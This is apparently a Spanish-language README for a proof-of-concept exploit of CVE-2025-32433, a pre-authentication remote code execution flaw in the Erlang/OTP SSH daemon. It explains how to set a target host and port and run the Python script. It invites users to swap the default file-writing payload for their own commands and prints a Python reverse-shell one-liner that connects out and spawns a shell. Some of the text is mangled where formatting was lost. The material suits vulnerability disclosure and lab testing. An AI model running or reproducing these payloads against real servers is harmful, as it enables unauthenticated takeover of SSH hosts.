
Exploit de prueba de concepto para CVE-2025-32433, una RCE previa a la autenticación en el demonio SSH de Erlang/OTP. Incluye un script en Python para enviar solicitudes de canal SSH manipuladas y ejecutar comandos arbitrarios.
CVE-2025-32433 es una vulnerabilidad de ejecución remota de código (RCE) que afecta al daemon SSH de Erlang/OTP.
La causa raíz es el manejo inadecuado de solicitudes de canal SSH previas a la autenticación, que un atacante puede manipular para
provocar la ejecución arbitraria de comandos antes de la autenticación.
El PoC incluido demuestra el envío de dichos paquetes SSH manipulados; de forma predeterminada escribe /lab.txt en el objetivo, pero se puede adaptar para otros comandos.
HOST = "127.0.0.1" # Target IP
PORT = 2222 # Target SSH port
python3 cve-2025-32433.py
De forma predeterminada crea con el contenido . Modifique la carga útil en para ejecutar sus propios comandos.
/lab.txtpwnedbuild_channel_request# Write a file file:write_file("/lab.txt", <<"pwned">>).Spawn a reverse shell
os:cmd("python3 -c 'import socket,subprocess,os; s=socket.socket(); s.connect(("127.0.0.1",2222)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); import pty; pty.spawn("sh")'")
SSH_MSG_KEXINIT manipulado para que parezca un handshake normal.SSH_MSG_CHANNEL_OPEN y SSH_MSG_CHANNEL_REQUEST con una carga útil exec antes de la autenticación.Descubrimiento y documentación por Matt Keeley (Platform Security). Agradecimientos a él por publicar el PoC y compartir detalles.
Enlace al blog: https://platformsecurity.com/blog/CVE-2025-32433-poc